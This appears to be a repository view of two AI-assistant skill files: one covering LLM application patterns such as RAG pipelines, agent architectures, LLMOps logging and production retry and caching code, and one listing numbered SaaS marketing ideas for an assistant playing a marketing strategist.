- Implementing RAG (Retrieval-Augmented Generation)
- Building AI agents with tools
- Setting up LLMOps monitoring
- Choosing between agent architectures
---
## 1. RAG Pipeline Architecture
### Overview
RAG (Retrieval-Augmented Generation) grounds LLM responses in your data.
```
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ Ingest │────▶│ Retrieve │────▶│ Generate │
│ Documents │ │ Context │ │ Response │
└─────────────┘ └─────────────┘ └─────────────┘
│ │ │
▼ ▼ ▼
┌─────────┐ ┌───────────┐ ┌───────────┐
│ Chunking│ │ Vector │ │ LLM │
│Embedding│ │ Search │ │ + Context│
└─────────┘ └───────────┘ └───────────┘
```
### 1.1 Document Ingestion
```python
# Chunking strategies
class ChunkingStrategy:
# Fixed-size chunks (simple but may break context)
FIXED_SIZE = "fixed_size" # e.g., 512 tokens
# Semantic chunking (preserves meaning)
SEMANTIC = "semantic" # Split on paragraphs/sections
# Recursive splitting (tries multiple separators)
RECURSIVE = "recursive" # ["\n\n", "\n", " ", ""]
# Document-aware (respects structure)
DOCUMENT_AWARE = "document_aware" # Headers, lists, etc.
# Recommended settings
CHUNK_CONFIG = {
"chunk_size": 512, # tokens
"chunk_overlap": 50, # token overlap between chunks
"separators": ["\n\n", "\n", ". ", " "],
}
```
### 1.2 Embedding & Storage
```python
# Vector database selection
VECTOR_DB_OPTIONS = {
"pinecone": {
"use_case": "Production, managed service",
"scale": "Billions of vectors",
"features": ["Hybrid search", "Metadata filtering"]
},
"weaviate": {
"use_case": "Self-hosted, multi-modal",
"scale": "Millions of vectors",
"features": ["GraphQL API", "Modules"]
},
"chromadb": {
"use_case": "Development, prototyping",
"scale": "Thousands of vectors",
"features": ["Simple API", "In-memory option"]
},
"pgvector": {
"use_case": "Existing Postgres infrastructure",
"scale": "Millions of vectors",
"features": ["SQL integration", "ACID compliance"]
}
}
# Embedding model selection
EMBEDDING_MODELS = {
"openai/text-embedding-3-small": {
"dimensions": 1536,
"cost": "$0.02/1M tokens",
"quality": "Good for most use cases"
},
"openai/text-embedding-3-large": {
"dimensions": 3072,
"cost": "$0.13/1M tokens",
"quality": "Best for complex queries"
},
"local/bge-large": {
"dimensions": 1024,
"cost": "Free (compute only)",
"quality": "Comparable to OpenAI small"
}
}
```
### 1.3 Retrieval Strategies
```python
# Basic semantic search
def semantic_search(query: str, top_k: int = 5):
query_embedding = embed(query)
results = vector_db.similarity_search(
query_embedding,
top_k=top_k
)
return results
# Hybrid search (semantic + keyword)
def hybrid_search(query: str, top_k: int = 5, alpha: float = 0.5):
"""
alpha=1.0: Pure semantic
alpha=0.0: Pure keyword (BM25)
alpha=0.5: Balanced
"""
semantic_results = vector_db.similarity_search(query)
keyword_results = bm25_search(query)
# Reciprocal Rank Fusion
return rrf_merge(semantic_results, keyword_results, alpha)
# Multi-query retrieval
def multi_query_retrieval(query: str):
"""Generate multiple query variations for better recall"""
queries = llm.generate_query_variations(query, n=3)
all_results = []
for q in queries:
all_results.extend(semantic_search(q))
return deduplicate(all_results)
# Contextual compression
def compressed_retrieval(query: str):
"""Retrieve then compress to relevant parts only"""
docs = semantic_search(query, top_k=10)
compressed = llm.extract_relevant_parts(docs, query)
return compressed
```
### 1.4 Generation with Context
```python
RAG_PROMPT_TEMPLATE = """
Answer the user's question based ONLY on the following context.
If the context doesn't contain enough information, say "I don't have enough information to answer that."
Context:
{context}
Question: {question}
Answer:"""
def generate_with_rag(question: str):
# Retrieve
context_docs = hybrid_search(question, top_k=5)
context = "\n\n".join([doc.content for doc in context_docs])
# Generate
prompt = RAG_PROMPT_TEMPLATE.format(
context=context,
question=question
)
response = llm.generate(prompt)
# Return with citations
return {
"answer": response,
"sources": [doc.metadata for doc in context_docs]
}
```
---
## 2. Agent Architectures
### 2.1 ReAct Pattern (Reasoning + Acting)
```
Thought: I need to search for information about X
Action: search("X")
Observation: [search results]
Thought: Based on the results, I should...
Action: calculate(...)
Observation: [calculation result]
Thought: I now have enough information
Action: final_answer("The answer is...")
```
```python
REACT_PROMPT = """
You are an AI assistant that can use tools to answer questions.
Available tools:
{tools_description}
Use this format:
Thought: [your reasoning about what to do next]
Action: [tool_name(arguments)]
Observation: [tool result - this will be filled in]
... (repeat Thought/Action/Observation as needed)
Thought: I have enough information to answer
Final Answer: [your final response]
Question: {question}
"""
class ReActAgent:
def __init__(self, tools: list, llm):
self.tools = {t.name: t for t in tools}
self.llm = llm
self.max_iterations = 10
def run(self, question: str) -> str:
prompt = REACT_PROMPT.format(
tools_description=self._format_tools(),
question=question
)
for _ in range(self.max_iterations):
response = self.llm.generate(prompt)
if "Final Answer:" in response:
return self._extract_final_answer(response)
action = self._parse_action(response)
observation = self._execute_tool(action)
prompt += f"\nObservation: {observation}\n"
return "Max iterations reached"
```
### 2.2 Function Calling Pattern
```python
# Define tools as functions with schemas
TOOLS = [
{
"name": "search_web",
"description": "Search the web for current information",
"parameters": {
"type": "object",
"properties": {
"query": {
"type": "string",
"description": "Search query"
}
},
"required": ["query"]
}
},
{
"name": "calculate",
"description": "Perform mathematical calculations",
"parameters": {
"type": "object",
"properties": {
"expression": {
"type": "string",
"description": "Math expression to evaluate"
}
},
"required": ["expression"]
}
}
]
class FunctionCallingAgent:
def run(self, question: str) -> str:
messages = [{"role": "user", "content": question}]
while True:
response = self.llm.chat(
messages=messages,
tools=TOOLS,
tool_choice="auto"
)
if response.tool_calls:
for tool_call in response.tool_calls:
result = self._execute_tool(
tool_call.name,
tool_call.arguments
)
messages.append({
"role": "tool",
"tool_call_id": tool_call.id,
"content": str(result)
})
else:
return response.content
```
### 2.3 Plan-and-Execute Pattern
```python
class PlanAndExecuteAgent:
"""
1. Create a plan (list of steps)
2. Execute each step
3. Replan if needed
"""
def run(self, task: str) -> str:
# Planning phase
plan = self.planner.create_plan(task)
# Returns: ["Step 1: ...", "Step 2: ...", ...]
results = []
for step in plan:
# Execute each step
result = self.executor.execute(step, context=results)
results.append(result)
# Check if replan needed
if self._needs_replan(task, results):
new_plan = self.planner.replan(
task,
completed=results,
remaining=plan[len(results):]
)
plan = new_plan
# Synthesize final answer
return self.synthesizer.summarize(task, results)
```
### 2.4 Multi-Agent Collaboration
```python
class AgentTeam:
"""
Specialized agents collaborating on complex tasks
"""
def __init__(self):
self.agents = {
"researcher": ResearchAgent(),
"analyst": AnalystAgent(),
"writer": WriterAgent(),
"critic": CriticAgent()
}
self.coordinator = CoordinatorAgent()
def solve(self, task: str) -> str:
# Coordinator assigns subtasks
assignments = self.coordinator.decompose(task)
results = {}
for assignment in assignments:
agent = self.agents[assignment.agent]
result = agent.execute(
assignment.subtask,
context=results
)
results[assignment.id] = result
# Critic reviews
critique = self.agents["critic"].review(results)
if critique.needs_revision:
# Iterate with feedback
return self.solve_with_feedback(task, results, critique)
return self.coordinator.synthesize(results)
```
---
## 3. Prompt IDE Patterns
### 3.1 Prompt Templates with Variables
```python
class PromptTemplate:
def __init__(self, template: str, variables: list[str]):
self.template = template
self.variables = variables
def format(self, **kwargs) -> str:
# Validate all variables provided
missing = set(self.variables) - set(kwargs.keys())
if missing:
raise ValueError(f"Missing variables: {missing}")
return self.template.format(**kwargs)
def with_examples(self, examples: list[dict]) -> str:
"""Add few-shot examples"""
example_text = "\n\n".join([
f"Input: {ex['input']}\nOutput: {ex['output']}"
for ex in examples
])
return f"{example_text}\n\n{self.template}"
# Usage
summarizer = PromptTemplate(
template="Summarize the following text in {style} style:\n\n{text}",
variables=["style", "text"]
)
prompt = summarizer.format(
style="professional",
text="Long article content..."
)
```
### 3.2 Prompt Versioning & A/B Testing
```python
class PromptRegistry:
def __init__(self, db):
self.db = db
def register(self, name: str, template: str, version: str):
"""Store prompt with version"""
self.db.save({
"name": name,
"template": template,
"version": version,
"created_at": datetime.now(),
"metrics": {}
})
def get(self, name: str, version: str = "latest") -> str:
"""Retrieve specific version"""
return self.db.get(name, version)
def ab_test(self, name: str, user_id: str) -> str:
"""Return variant based on user bucket"""
variants = self.db.get_all_versions(name)
bucket = hash(user_id) % len(variants)
return variants[bucket]
def record_outcome(self, prompt_id: str, outcome: dict):
"""Track prompt performance"""
self.db.update_metrics(prompt_id, outcome)
```
### 3.3 Prompt Chaining
```python
class PromptChain:
"""
Chain prompts together, passing output as input to next
"""
def __init__(self, steps: list[dict]):
self.steps = steps
def run(self, initial_input: str) -> dict:
context = {"input": initial_input}
results = []
for step in self.steps:
prompt = step["prompt"].format(**context)
output = llm.generate(prompt)
# Parse output if needed
if step.get("parser"):
output = step["parser"](output)
context[step["output_key"]] = output
results.append({
"step": step["name"],
"output": output
})
return {
"final_output": context[self.steps[-1]["output_key"]],
"intermediate_results": results
}
# Example: Research → Analyze → Summarize
chain = PromptChain([
{
"name": "research",
"prompt": "Research the topic: {input}",
"output_key": "research"
},
{
"name": "analyze",
"prompt": "Analyze these findings:\n{research}",
"output_key": "analysis"
},
{
"name": "summarize",
"prompt": "Summarize this analysis in 3 bullet points:\n{analysis}",
"output_key": "summary"
}
])
```
---
## 4. LLMOps & Observability
### 4.1 Metrics to Track
```python
LLM_METRICS = {
# Performance
"latency_p50": "50th percentile response time",
"latency_p99": "99th percentile response time",
"tokens_per_second": "Generation speed",
# Quality
"user_satisfaction": "Thumbs up/down ratio",
"task_completion": "% tasks completed successfully",
"hallucination_rate": "% responses with factual errors",
# Cost
"cost_per_request": "Average $ per API call",
"tokens_per_request": "Average tokens used",
"cache_hit_rate": "% requests served from cache",
# Reliability
"error_rate": "% failed requests",
"timeout_rate": "% requests that timed out",
"retry_rate": "% requests needing retry"
}
```
### 4.2 Logging & Tracing
```python
import logging
from opentelemetry import trace
tracer = trace.get_tracer(__name__)
class LLMLogger:
def log_request(self, request_id: str, data: dict):
"""Log LLM request for debugging and analysis"""
log_entry = {
"request_id": request_id,
"timestamp": datetime.now().isoformat(),
"model": data["model"],
"prompt": data["prompt"][:500], # Truncate for storage
"prompt_tokens": data["prompt_tokens"],
"temperature": data.get("temperature", 1.0),
"user_id": data.get("user_id"),
}
logging.info(f"LLM_REQUEST: {json.dumps(log_entry)}")
def log_response(self, request_id: str, data: dict):
"""Log LLM response"""
log_entry = {
"request_id": request_id,
"completion_tokens": data["completion_tokens"],
"total_tokens": data["total_tokens"],
"latency_ms": data["latency_ms"],
"finish_reason": data["finish_reason"],
"cost_usd": self._calculate_cost(data),
}
logging.info(f"LLM_RESPONSE: {json.dumps(log_entry)}")
# Distributed tracing
@tracer.start_as_current_span("llm_call")
def call_llm(prompt: str) -> str:
span = trace.get_current_span()
span.set_attribute("prompt.length", len(prompt))
response = llm.generate(prompt)
span.set_attribute("response.length", len(response))
span.set_attribute("tokens.total", response.usage.total_tokens)
return response.content
```
### 4.3 Evaluation Framework
```python
class LLMEvaluator:
"""
Evaluate LLM outputs for quality
"""
def evaluate_response(self,
question: str,
response: str,
ground_truth: str = None) -> dict:
scores = {}
# Relevance: Does it answer the question?
scores["relevance"] = self._score_relevance(question, response)
# Coherence: Is it well-structured?
scores["coherence"] = self._score_coherence(response)
# Groundedness: Is it based on provided context?
scores["groundedness"] = self._score_groundedness(response)
# Accuracy: Does it match ground truth?
if ground_truth:
scores["accuracy"] = self._score_accuracy(response, ground_truth)
# Harmfulness: Is it safe?
scores["safety"] = self._score_safety(response)
return scores
def run_benchmark(self, test_cases: list[dict]) -> dict:
"""Run evaluation on test set"""
results = []
for case in test_cases:
response = llm.generate(case["prompt"])
scores = self.evaluate_response(
question=case["prompt"],
response=response,
ground_truth=case.get("expected")
)
results.append(scores)
return self._aggregate_scores(results)
```
---
## 5. Production Patterns
### 5.1 Caching Strategy
```python
import hashlib
from functools import lru_cache
class LLMCache:
def __init__(self, redis_client, ttl_seconds=3600):
self.redis = redis_client
self.ttl = ttl_seconds
def _cache_key(self, prompt: str, model: str, **kwargs) -> str:
"""Generate deterministic cache key"""
content = f"{model}:{prompt}:{json.dumps(kwargs, sort_keys=True)}"
return hashlib.sha256(content.encode()).hexdigest()
def get_or_generate(self, prompt: str, model: str, **kwargs) -> str:
key = self._cache_key(prompt, model, **kwargs)
# Check cache
cached = self.redis.get(key)
if cached:
return cached.decode()
# Generate
response = llm.generate(prompt, model=model, **kwargs)
# Cache (only cache deterministic outputs)
if kwargs.get("temperature", 1.0) == 0:
self.redis.setex(key, self.ttl, response)
return response
```
### 5.2 Rate Limiting & Retry
```python
import time
from tenacity import retry, wait_exponential, stop_after_attempt
class RateLimiter:
def __init__(self, requests_per_minute: int):
self.rpm = requests_per_minute
self.timestamps = []
def acquire(self):
"""Wait if rate limit would be exceeded"""
now = time.time()
# Remove old timestamps
self.timestamps = [t for t in self.timestamps if now - t < 60]
if len(self.timestamps) >= self.rpm:
sleep_time = 60 - (now - self.timestamps[0])
time.sleep(sleep_time)
self.timestamps.append(time.time())
# Retry with exponential backoff
@retry(
wait=wait_exponential(multiplier=1, min=4, max=60),
stop=stop_after_attempt(5)
)
def call_llm_with_retry(prompt: str) -> str:
try:
return llm.generate(prompt)
except RateLimitError:
raise # Will trigger retry
except APIError as e:
if e.status_code >= 500:
raise # Retry server errors
raise # Don't retry client errors
```
### 5.3 Fallback Strategy
```python
class LLMWithFallback:
def __init__(self, primary: str, fallbacks: list[str]):
self.primary = primary
self.fallbacks = fallbacks
def generate(self, prompt: str, **kwargs) -> str:
models = [self.primary] + self.fallbacks
for model in models:
try:
return llm.generate(prompt, model=model, **kwargs)
except (RateLimitError, APIError) as e:
logging.warning(f"Model {model} failed: {e}")
continue
raise AllModelsFailedError("All models exhausted")
# Usage
llm_client = LLMWithFallback(
primary="gpt-4-turbo",
fallbacks=["gpt-3.5-turbo", "claude-3-sonnet"]
)
```
---
## Architecture Decision Matrix
| Pattern | Use When | Complexity | Cost |
| :------------------- | :--------------- | :--------- | :-------- |
| **Simple RAG** | FAQ, docs search | Low | Low |
| **Hybrid RAG** | Mixed queries | Medium | Medium |
| **ReAct Agent** | Multi-step tasks | Medium | Medium |
| **Function Calling** | Structured tools | Low | Low |
| **Plan-Execute** | Complex tasks | High | High |
| **Multi-Agent** | Research tasks | Very High | Very High |
---
## Resources
- [Dify Platform](https://github.com/langgenius/dify)
- [LangChain Docs](https://python.langchain.com/)
- [LlamaIndex](https://www.llamaindex.ai/)
- [Anthropic Cookbook](https://github.com/anthropics/anthropic-cookbook)

565
skills/marketing-ideas/SKILL.md Normal file
View File

@@ -0,0 +1,565 @@
---
name: marketing-ideas
description: "When the user needs marketing ideas, inspiration, or strategies for their SaaS or software product. Also use when the user asks for 'marketing ideas,' 'growth ideas,' 'how to market,' 'marketing strategies,' 'marketing tactics,' 'ways to promote,' or 'ideas to grow.' This skill provides 140 proven marketing approaches organized by category."
---
# Marketing Ideas for SaaS
You are a marketing strategist with a library of 140 proven marketing ideas. Your goal is to help users find the right marketing strategies for their specific situation, stage, and resources.
## How to Use This Skill
When asked for marketing ideas:
1. Ask about their product, audience, and current stage if not clear
2. Suggest 3-5 most relevant ideas based on their context
3. Provide details on implementation for chosen ideas
4. Consider their resources (time, budget, team size)
---
## The 140 Marketing Ideas
Organized by category for easy reference.
---
## Content & SEO
### 3. Easy Keyword Ranking
Target low-competition keywords where you can rank quickly. Find terms competitors overlook—niche variations, long-tail queries, emerging topics. Build authority in micro-niches before expanding.
### 7. SEO Audit
Conduct comprehensive technical SEO audits of your own site and share findings publicly. Document fixes and improvements to build authority while improving your rankings.
### 39. Glossary Marketing
Create comprehensive glossaries defining industry terms. Each term becomes an SEO-optimized page targeting "what is X" searches, building topical authority while capturing top-of-funnel traffic.
### 40. Programmatic SEO
Build template-driven pages at scale targeting keyword patterns. Location pages, comparison pages, integration pages—any pattern with search volume can become a scalable content engine.
### 41. Content Repurposing
Transform one piece of content into multiple formats. Blog post becomes Twitter thread, YouTube video, podcast episode, infographic. Maximize ROI on content creation.
### 56. Proprietary Data Content
Leverage unique data from your product to create original research and reports. Data competitors can't replicate creates linkable, quotable assets.
### 67. Internal Linking
Strategic internal linking distributes authority and improves crawlability. Build topical clusters connecting related content to strengthen overall SEO performance.
### 73. Content Refreshing
Regularly update existing content with fresh data, examples, and insights. Refreshed content often outperforms new content and protects existing rankings.
### 74. Knowledge Base SEO
Optimize help documentation for search. Support articles targeting problem-solution queries capture users actively seeking solutions.
### 137. Parasite SEO
Publish content on high-authority platforms (Medium, LinkedIn, Substack) that rank faster than your own domain. Funnel that traffic back to your product.
---
## Competitor & Comparison
### 2. Competitor Comparison Pages
Create detailed comparison pages positioning your product against competitors. "[Your Product] vs [Competitor]" and "[Competitor] alternatives" pages capture high-intent searchers.
### 4. Marketing Jiu-Jitsu
Turn competitor weaknesses into your strengths. When competitors raise prices, launch affordability campaigns. When they have outages, emphasize your reliability.
### 38. Competitive Ad Research
Study competitor advertising through tools like SpyFu or Facebook Ad Library. Learn what messaging resonates, then improve on their approach.
---
## Free Tools & Engineering
### 5. Side Projects as Marketing
Build small, useful tools related to your main product. Side projects attract users who may later convert, generate backlinks, and showcase your capabilities.
### 30. Engineering as Marketing
Build free tools that solve real problems for your target audience. Calculators, analyzers, generators—useful utilities that naturally lead to your paid product.
### 31. Importers as Marketing
Build import tools for competitor data. "Import from [Competitor]" reduces switching friction while capturing users actively looking to leave.
### 92. Quiz Marketing
Create interactive quizzes that engage users while qualifying leads. Personality quizzes, assessments, and diagnostic tools generate shares and capture emails.
### 93. Calculator Marketing
Build calculators solving real problems—ROI calculators, pricing estimators, savings tools. Calculators attract links, rank well, and demonstrate value.
### 94. Chrome Extensions
Create browser extensions providing standalone value. Chrome Web Store becomes another distribution channel while keeping your brand in daily view.
### 110. Microsites
Build focused microsites for specific campaigns, products, or audiences. Dedicated domains can rank faster and allow bolder positioning.
### 117. Scanners
Build free scanning tools that audit or analyze something for users. Website scanners, security checkers, performance analyzers—provide value while showcasing expertise.
### 122. Public APIs
Open APIs enable developers to build on your platform, creating an ecosystem that attracts users and increases switching costs.
---
## Paid Advertising
### 18. Podcast Advertising
Sponsor relevant podcasts to reach engaged audiences. Host-read ads perform especially well due to built-in trust.
### 48. Pre-targeting Ads
Show awareness ads before launching direct response campaigns. Warm audiences convert better than cold ones.
### 55. Facebook Ads
Meta's detailed targeting reaches specific audiences. Test creative variations and leverage retargeting for users who've shown interest.
### 57. Instagram Ads
Visual-first advertising for products with strong imagery. Stories and Reels ads capture attention in native formats.
### 60. Twitter Ads
Reach engaged professionals discussing industry topics. Promoted tweets and follower campaigns build visibility.
### 62. LinkedIn Ads
Target by job title, company size, and industry. Premium CPMs justified by B2B purchase intent.
### 64. Reddit Ads
Reach passionate communities with authentic messaging. Reddit users detect inauthentic ads quickly—transparency wins.
### 66. Quora Ads
Target users actively asking questions your product answers. Intent-rich environment for educational ads.
### 68. Google Ads
Capture high-intent search queries. Brand terms protect your name; competitor terms capture switchers; category terms reach researchers.
### 70. YouTube Ads
Video ads with detailed targeting. Pre-roll and discovery ads reach users consuming related content.
### 72. Cross-Platform Retargeting
Follow users across platforms with consistent messaging. Retargeting converts window shoppers into buyers.
### 129. Click-to-Messenger Ads
Ads that open direct conversations rather than landing pages. Higher engagement through immediate dialogue.
---
## Social Media & Community
### 42. Community Marketing
Build and nurture communities around your product or industry. Slack groups, Discord servers, Facebook groups, or forums create loyal advocates.
### 43. Quora Marketing
Answer relevant questions with genuine expertise. Include product mentions where naturally appropriate.
### 76. Reddit Keyword Research
Mine Reddit for real language your audience uses. Discover pain points, objections, and desires expressed naturally.
### 82. Reddit Marketing
Participate authentically in relevant subreddits. Provide value first; promotional content fails without established credibility.
### 105. LinkedIn Audience
Build personal brands on LinkedIn for B2B reach. Thought leadership content builds authority and drives inbound interest.
### 106. Instagram Audience
Visual storytelling for products with strong aesthetics. Behind-the-scenes, user stories, and product showcases build following.
### 107. X Audience
Build presence on X/Twitter through consistent value. Threads, insights, and engagement grow followings that convert.
### 130. Short Form Video
TikTok, Reels, and Shorts reach new audiences with snackable content. Educational and entertaining short videos spread organically.
### 138. Engagement Pods
Coordinate with peers to boost each other's content engagement. Early engagement signals help content reach wider audiences.
### 139. Comment Marketing
Thoughtful comments on relevant content build visibility. Add value to discussions where your target audience pays attention.
---
## Email Marketing
### 17. Mistake Email Marketing
Send "oops" emails when something genuinely goes wrong. Authenticity and transparency often generate higher engagement than polished campaigns.
### 25. Reactivation Emails
Win back churned or inactive users with targeted campaigns. Remind them of value, share what's new, offer incentives.
### 28. Founder Welcome Email
Personal welcome emails from founders create connection. Share your story, ask about their goals, start relationships.
### 36. Dynamic Email Capture
Smart email capture that adapts to user behavior. Exit intent, scroll depth, time on page—trigger popups at the right moment.
### 79. Monthly Newsletters
Consistent newsletters keep your brand top-of-mind. Curate industry news, share insights, highlight product updates.
### 80. Inbox Placement
Technical email optimization for deliverability. Authentication, list hygiene, and engagement signals determine whether emails arrive.
### 113. Onboarding Emails
Guide new users to activation with targeted email sequences. Behavior-triggered emails outperform time-based schedules.
### 115. Win-back Emails
Re-engage churned users with compelling reasons to return. New features, improvements, or offers reignite interest.
### 116. Trial Reactivation
Expired trials aren't lost causes. Targeted campaigns highlighting new value can recover abandoned trials.
---
## Partnerships & Programs
### 9. Affiliate Discovery Through Backlinks
Find potential affiliates by analyzing who links to competitors. Sites already promoting similar products may welcome affiliate relationships.
### 27. Influencer Whitelisting
Run ads through influencer accounts for authentic reach. Whitelisting combines influencer credibility with paid targeting.
### 33. Reseller Programs
Enable agencies and service providers to resell your product. White-label options create invested distribution partners.
### 37. Expert Networks
Build networks of certified experts who implement your product. Experts extend your reach while ensuring quality implementations.
### 50. Newsletter Swaps
Exchange promotional mentions with complementary newsletters. Access each other's audiences without advertising costs.
### 51. Article Quotes
Contribute expert quotes to journalists and publications. Tools like HARO connect experts with writers seeking sources.
### 77. Pixel Sharing
Partner with complementary companies to share remarketing audiences. Expand reach through strategic data partnerships.
### 78. Shared Slack Channels
Create shared channels with partners and customers. Direct communication lines strengthen relationships.
### 97. Affiliate Program
Structured commission programs for referrers. Affiliates become motivated salespeople earning from successful referrals.
### 98. Integration Marketing
Joint marketing with integration partners. Combined audiences and shared promotion amplify reach for both products.
### 99. Community Sponsorship
Sponsor relevant communities, newsletters, or publications. Aligned sponsorships build brand awareness with target audiences.
---
## Events & Speaking
### 15. Live Webinars
Educational webinars demonstrate expertise while generating leads. Interactive formats create engagement and urgency.
### 53. Virtual Summits
Multi-speaker online events attract audiences through varied perspectives. Summit speakers promote to their audiences, amplifying reach.
### 87. Roadshows
Take your product on the road to meet customers directly. Regional events create personal connections at scale.
### 90. Local Meetups
Host or attend local meetups in key markets. In-person connections create stronger relationships than digital alone.
### 91. Meetup Sponsorship
Sponsor relevant meetups to reach engaged local audiences. Food, venue, or swag sponsorships generate goodwill.
### 103. Conference Speaking
Speak at industry conferences to reach engaged audiences. Presentations showcase expertise while generating leads.
### 126. Conferences
Host your own conference to become the center of your industry. User conferences strengthen communities and generate content.
### 132. Conference Sponsorship
Sponsor relevant conferences for brand visibility. Booth presence, speaking slots, and attendee lists justify investment.
---
## PR & Media
### 8. Media Acquisitions as Marketing
Acquire newsletters, podcasts, or publications in your space. Owned media provides direct access to engaged audiences.
### 52. Press Coverage
Pitch newsworthy stories to relevant publications. Launches, funding, data, and trends create press opportunities.
### 84. Fundraising PR
Leverage funding announcements for press coverage. Rounds signal validation and create natural news hooks.
### 118. Documentaries
Create documentary content exploring your industry or customers. Long-form storytelling builds deep connection and differentiation.
---
## Launches & Promotions
### 21. Black Friday Promotions
Annual deals create urgency and acquisition spikes. Promotional periods capture deal-seekers who become long-term customers.
### 22. Product Hunt Launch
Structured Product Hunt launches reach early adopters. Preparation, timing, and community engagement drive successful launches.
### 23. Early-Access Referrals
Reward referrals with earlier access during launches. Waitlist referral programs create viral anticipation.
### 44. New Year Promotions
New Year brings fresh budgets and goal-setting energy. Promotional timing aligned with renewal mindsets increases conversion.
### 54. Early Access Pricing
Launch with discounted early access tiers. Early supporters get deals while you build testimonials and feedback.
### 58. Product Hunt Alternatives
Launch on alternatives to Product Hunt—BetaList, Launching Next, AlternativeTo. Multiple launch platforms expand reach.
### 59. Twitter Giveaways
Engagement-boosting giveaways that require follows, retweets, or tags. Giveaways grow following while generating buzz.
### 109. Giveaways
Strategic giveaways attract attention and capture leads. Product giveaways, partner prizes, or experience rewards create engagement.
### 119. Vacation Giveaways
Grand prize giveaways generate massive engagement. Dream vacation packages motivate sharing and participation.
### 140. Lifetime Deals
One-time payment deals generate cash and users. Lifetime deal platforms reach deal-hunting audiences willing to pay upfront.
---
## Product-Led Growth
### 16. Powered By Marketing
"Powered by [Your Product]" badges on customer output create free impressions. Every customer becomes a marketing channel.
### 19. Free Migrations
Offer free migration services from competitors. Reduce switching friction while capturing users ready to leave.
### 20. Contract Buyouts
Pay to exit competitor contracts. Dramatic commitment removes the final barrier for locked-in prospects.
### 32. One-Click Registration
Minimize signup friction with one-click OAuth options. Pre-filled forms and instant access increase conversion.
### 69. In-App Upsells
Strategic upgrade prompts within the product experience. Contextual upsells at usage limits or feature attempts convert best.
### 71. Newsletter Referrals
Built-in referral programs for newsletters and content. Easy sharing mechanisms turn subscribers into promoters.
### 75. Viral Loops
Product mechanics that naturally encourage sharing. Collaboration features, public outputs, or referral incentives create organic growth.
### 114. Offboarding Flows
Optimize cancellation flows to retain or learn. Exit surveys, save offers, and pause options reduce churn.
### 124. Concierge Setup
White-glove onboarding for high-value accounts. Personal setup assistance increases activation and retention.
### 127. Onboarding Optimization
Continuous improvement of the new user experience. Faster time-to-value increases conversion and retention.
---
## Content Formats
### 1. Playlists as Marketing
Create Spotify playlists for your audience—productivity playlists, work music, industry-themed collections. Daily listening touchpoints build brand affinity.
### 46. Template Marketing
Offer free templates users can immediately use. Templates in your product create habit and dependency while showcasing capabilities.
### 49. Graphic Novel Marketing
Transform complex stories into visual narratives. Graphic novels stand out and make abstract concepts tangible.
### 65. Promo Videos
High-quality promotional videos showcase your product professionally. Invest in production value for shareable, memorable content.
### 81. Industry Interviews
Interview customers, experts, and thought leaders. Interview content builds relationships while creating valuable assets.
### 89. Social Screenshots
Design shareable screenshot templates for social proof. Make it easy for customers to share wins and testimonials.
### 101. Online Courses
Educational courses establish authority while generating leads. Free courses attract learners; paid courses create revenue.
### 102. Book Marketing
Author a book establishing expertise in your domain. Books create credibility, speaking opportunities, and media coverage.
### 111. Annual Reports
Publish annual reports showcasing industry data and trends. Original research becomes a linkable, quotable reference.
### 120. End of Year Wraps
Personalized year-end summaries users want to share. "Spotify Wrapped" style reports turn data into social content.
### 121. Podcasts
Launch a podcast reaching audiences during commutes and workouts. Regular audio content builds intimate audience relationships.
### 63. Changelogs
Public changelogs showcase product momentum. Regular updates demonstrate active development and responsiveness.
### 112. Public Demos
Live product demonstrations showing real usage. Transparent demos build trust and answer questions in real-time.
---
## Unconventional & Creative
### 6. Awards as Marketing
Create industry awards positioning your brand as tastemaker. Award programs attract applications, sponsors, and press coverage.
### 10. Challenges as Marketing
Launch viral challenges that spread organically. Creative challenges generate user content and social sharing.
### 11. Reality TV Marketing
Create reality-show style content following real customers. Documentary competition formats create engaging narratives.
### 12. Controversy as Marketing
Strategic positioning against industry norms. Contrarian takes generate attention and discussion.
### 13. Moneyball Marketing
Data-driven marketing finding undervalued channels and tactics. Analytics identify opportunities competitors overlook.
### 14. Curation as Marketing
Curate valuable resources for your audience. Directories, lists, and collections provide value while building authority.
### 29. Grants as Marketing
Offer grants to customers or community members. Grant programs generate applications, PR, and goodwill.
### 34. Product Competitions
Sponsor competitions using your product. Hackathons, design contests, and challenges showcase capabilities while engaging users.
### 35. Cameo Marketing
Use Cameo celebrities for personalized marketing messages. Unexpected celebrity endorsements generate buzz and shares.
### 83. OOH Advertising
Out-of-home advertising—billboards, transit ads, and placements. Physical presence in key locations builds brand awareness.
### 125. Marketing Stunts
Bold, attention-grabbing marketing moments. Well-executed stunts generate press coverage and social sharing.
### 128. Guerrilla Marketing
Unconventional, low-cost marketing in unexpected places. Creative guerrilla tactics stand out from traditional advertising.
### 136. Humor Marketing
Use humor to stand out and create memorability. Funny content gets shared and builds brand personality.
---
## Platforms & Marketplaces
### 24. Open Source as Marketing
Open-source components or tools build developer goodwill. Open source creates community, contributions, and credibility.
### 61. App Store Optimization
Optimize app store listings for discoverability. Keywords, screenshots, and reviews drive organic app installs.
### 86. App Marketplaces
List in relevant app marketplaces and directories. Salesforce AppExchange, Shopify App Store, and similar platforms provide distribution.
### 95. YouTube Reviews
Get YouTubers to review your product. Authentic reviews reach engaged audiences and create lasting content.
### 96. YouTube Channel
Build a YouTube presence with tutorials, updates, and thought leadership. Video content compounds in value over time.
### 108. Source Platforms
Submit to platforms that aggregate tools and products. G2, Capterra, GetApp, and similar directories drive discovery.
### 88. Review Sites
Actively manage presence on review platforms. Reviews influence purchase decisions; actively request and respond to them.
### 100. Live Audio
Host live audio discussions on Twitter Spaces, Clubhouse, or LinkedIn Audio. Real-time conversation creates intimate engagement.
---
## International & Localization
### 133. International Expansion
Expand to new geographic markets. Localization, partnerships, and regional marketing unlock new growth.
### 134. Price Localization
Adjust pricing for local purchasing power. Localized pricing increases conversion in price-sensitive markets.
---
## Developer & Technical
### 104. Investor Marketing
Market to investors for downstream portfolio introductions. Investors recommend tools to their portfolio companies.
### 123. Certifications
Create certification programs validating expertise. Certifications create invested advocates while generating training revenue.
### 131. Support as Marketing
Turn support interactions into marketing opportunities. Exceptional support creates stories customers share.
### 135. Developer Relations
Build relationships with developer communities. DevRel creates advocates who recommend your product to peers.
---
## Audience-Specific
### 26. Two-Sided Referrals
Reward both referrer and referred in referral programs. Dual incentives motivate sharing while welcoming new users.
### 45. Podcast Tours
Guest on multiple podcasts reaching your target audience. Podcast tours create compounding awareness across shows.
### 47. Customer Language
Use the exact words your customers use. Mining reviews, support tickets, and interviews for language that resonates.
---
